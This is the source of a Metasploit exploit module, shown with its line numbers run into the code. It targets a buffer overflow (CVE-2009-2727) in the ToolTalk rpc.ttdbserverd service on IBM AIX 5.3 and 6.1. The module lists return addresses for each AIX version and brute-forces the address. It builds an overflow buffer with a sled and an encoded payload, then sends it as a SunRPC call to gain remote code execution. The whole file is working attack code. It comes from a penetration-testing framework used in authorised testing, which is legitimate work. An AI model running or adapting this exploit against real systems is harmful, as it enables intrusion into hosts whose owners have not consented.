Path: blob/master/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
32787 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::SunRPC9include Msf::Exploit::Brute1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',16'Description' => %q{17This module exploits a buffer overflow vulnerability in _tt_internal_realpath18function of the ToolTalk database server (rpc.ttdbserverd).19},20'Author' => [21'Ramon de C Valle',22'Adriano Lima <adriano[at]risesecurity.org>',23],24'References' => [25[ 'CVE', '2009-2727'],26[ 'OSVDB', '55151' ]27],28'Payload' => {29'BadChars' => "\x00"30},31'Targets' => [32[33'IBM AIX Version 6.1.4',34{35'Arch' => 'ppc',36'Platform' => 'aix',37'Ret' => 0x20099430 + 4096,38'Addr1' => 0x2ff1ff50 - 8192,39'AIX' => '6.1.4',40'Bruteforce' =>41{42'Start' => { 'Ret' => 0x20099430 - 8192 },43'Stop' => { 'Ret' => 0x20099430 + 8192 },44'Step' => 102445}46}47],48[49'IBM AIX Version 6.1.3',50{51'Arch' => 'ppc',52'Platform' => 'aix',53'Ret' => 0x20099280 + 4096,54'Addr1' => 0x2ff1ffd0 - 8192,55'AIX' => '6.1.3',56'Bruteforce' =>57{58'Start' => { 'Ret' => 0x20099280 - 8192 },59'Stop' => { 'Ret' => 0x20099280 + 8192 },60'Step' => 102461}62}63],64[65'IBM AIX Version 6.1.2',66{67'Arch' => 'ppc',68'Platform' => 'aix',69'Ret' => 0x20099280 + 4096,70'Addr1' => 0x2ff1ffd0 - 8192,71'AIX' => '6.1.2',72'Bruteforce' =>73{74'Start' => { 'Ret' => 0x20099280 - 8192 },75'Stop' => { 'Ret' => 0x20099280 + 8192 },76'Step' => 102477}78}79],80[81'IBM AIX Version 6.1.1',82{83'Arch' => 'ppc',84'Platform' => 'aix',85'Ret' => 0x20099280 + 4096,86'Addr1' => 0x2ff1ffd0 - 8192,87'AIX' => '6.1.1',88'Bruteforce' =>89{90'Start' => { 'Ret' => 0x20099280 - 8192 },91'Stop' => { 'Ret' => 0x20099280 + 8192 },92'Step' => 102493}94}95],96[97'IBM AIX Version 6.1.0',98{99'Arch' => 'ppc',100'Platform' => 'aix',101'Ret' => 0x20099280 + 4096,102'Addr1' => 0x2ff1ffd0 - 8192,103'AIX' => '6.1.0',104'Bruteforce' =>105{106'Start' => { 'Ret' => 0x20099280 - 8192 },107'Stop' => { 'Ret' => 0x20099280 + 8192 },108'Step' => 1024109}110}111],112[113'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',114{115'Arch' => 'ppc',116'Platform' => 'aix',117'Ret' => 0x20096ba0 + 4096,118'Addr1' => 0x2ff1ff14 - 8192,119'AIX' => '5.3.9',120'Bruteforce' =>121{122'Start' => { 'Ret' => 0x20096ba0 - 8192 },123'Stop' => { 'Ret' => 0x20096ba0 + 8192 },124'Step' => 1024125}126}127],128[129'IBM AIX Version 5.3.10',130{131'Arch' => 'ppc',132'Platform' => 'aix',133'Ret' => 0x20096bf0 + 4096,134'Addr1' => 0x2ff1ff14 - 8192,135'AIX' => '5.3.10',136'Bruteforce' =>137{138'Start' => { 'Ret' => 0x20096bf0 - 8192 },139'Stop' => { 'Ret' => 0x20096bf0 + 8192 },140'Step' => 1024141}142}143],144[145'IBM AIX Version 5.3.9',146{147'Arch' => 'ppc',148'Platform' => 'aix',149'Ret' => 0x20096ba0 + 4096,150'Addr1' => 0x2ff1ff14 - 8192,151'AIX' => '5.3.9',152'Bruteforce' =>153{154'Start' => { 'Ret' => 0x20096ba0 - 8192 },155'Stop' => { 'Ret' => 0x20096ba0 + 8192 },156'Step' => 1024157}158}159],160[161'IBM AIX Version 5.3.8',162{163'Arch' => 'ppc',164'Platform' => 'aix',165'Ret' => 0x20096c10 + 4096,166'Addr1' => 0x2ff1ff98 - 8192,167'AIX' => '5.3.8',168'Bruteforce' =>169{170'Start' => { 'Ret' => 0x20096c10 - 8192 },171'Stop' => { 'Ret' => 0x20096c10 + 8192 },172'Step' => 1024173}174}175],176[177'IBM AIX Version 5.3.7',178{179'Arch' => 'ppc',180'Platform' => 'aix',181'Ret' => 0x20096c10 + 4096,182'Addr1' => 0x2ff1ff98 - 8192,183'AIX' => '5.3.7',184'Bruteforce' =>185{186'Start' => { 'Ret' => 0x20096c10 - 8192 },187'Stop' => { 'Ret' => 0x20096c10 + 8192 },188'Step' => 1024189}190}191],192[193'Debug IBM AIX Version 6.1',194{195'Arch' => 'ppc',196'Platform' => 'aix',197'Ret' => 0xaabbccdd,198'Addr1' => 0xddccbbaa,199'AIX' => '6.1.4',200'Bruteforce' =>201{202'Start' => { 'Ret' => 0xaabbccdd },203'Stop' => { 'Ret' => 0xaabbccdd },204'Step' => 1024205}206}207],208[209'Debug IBM AIX Version 5.3',210{211'Arch' => 'ppc',212'Platform' => 'aix',213'Ret' => 0xaabbccdd,214'Addr1' => 0xddccbbaa,215'AIX' => '5.3.10',216'Bruteforce' =>217{218'Start' => { 'Ret' => 0xaabbccdd },219'Stop' => { 'Ret' => 0xaabbccdd },220'Step' => 1024221}222}223],224],225'DefaultTarget' => 0,226'DisclosureDate' => '2009-06-17',227'Notes' => {228'Reliability' => [ REPEATABLE_SESSION ],229'Stability' => [ CRASH_SERVICE_RESTARTS ],230'SideEffects' => [ IOC_IN_LOGS ]231}232)233)234end235236def brute_exploit(brute_target)237if !@aixpayload238datastore['AIX'] = target['AIX']239@aixpayload = regenerate_payload.encoded240end241242print_status('Trying to exploit rpc.ttdbserverd with address 0x%08x...' % brute_target['Ret'])243244begin245sunrpc_create('tcp', 100083, 1)246247if target['AIX'] =~ /6\./248buf = 'A'249else250buf = 'AA'251end252253buf << [target['Addr1']].pack('N') * (1022 + 8)254buf << [brute_target['Ret']].pack('N') * 32255256if target['AIX'] =~ /6\./257buf << 'AAA'258else259buf << 'AA'260end261262buf << "\x7f\xff\xfb\x78" * 1920263buf << @aixpayload264buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)265266print_status('Sending procedure 15 call message...')267sunrpc_call(15, buf)268269sunrpc_destroy270handler271rescue Rex::Proto::SunRPC::RPCTimeout272# print_error('RPCTimeout')273rescue EOFError274# print_error('EOFError')275end276end277end278279280